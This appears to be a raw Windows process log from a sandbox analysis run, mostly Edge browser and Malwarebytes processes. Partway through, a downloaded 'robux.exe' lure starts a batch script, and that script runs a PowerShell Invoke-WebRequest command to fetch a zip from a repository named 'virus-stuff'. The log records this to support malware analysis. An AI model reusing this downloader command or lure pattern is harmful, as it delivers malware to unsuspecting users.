"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff8e55546f8,0x7ff8e5554708,0x7ff8e5554718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2020 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4292 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3680 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3680 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4192 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5368 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2b4 0x4a0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4312 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1828 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6640 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6776 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\robux.exe
"C:\Users\Admin\Downloads\robux.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\63C7.tmp\63D8.tmp\63D9.bat C:\Users\Admin\Downloads\robux.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
C:\Users\Admin\Downloads\robux.exe
"C:\Users\Admin\Downloads\robux.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\81A0.tmp\81A1.tmp\81A2.bat C:\Users\Admin\Downloads\robux.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
C:\Windows\system32\timeout.exe
timeout /t 3 /nobreak
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6004 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6148 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1968,13313231752553097980,2293848721486892102,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6800 /prefetch:8
C:\Users\Admin\Downloads\MBSetup.exe
"C:\Users\Admin\Downloads\MBSetup.exe"
C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe"
C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe" /installmbtun
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "9" "C:\Program Files\Malwarebytes\Anti-Malware\mbtun\mbtun.inf" "9" "4ba9030c7" "0000000000000148" "Service-0x0-3e7$\Default" "0000000000000158" "208" "C:\Program Files\Malwarebytes\Anti-Malware\mbtun"
C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe" /Service /Protected
C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe"
C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe" nowindow
C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"
C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
"C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe"
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe
"C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe" "C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\config\UpdateControllerConfig.json" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\staging" /db:dbupdate /su:no
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8e55546f8,0x7ff8e5554708,0x7ff8e5554718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2280 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4408 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4408 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3044 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2532 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5368 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,3373904601108238897,1823866682819480636,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
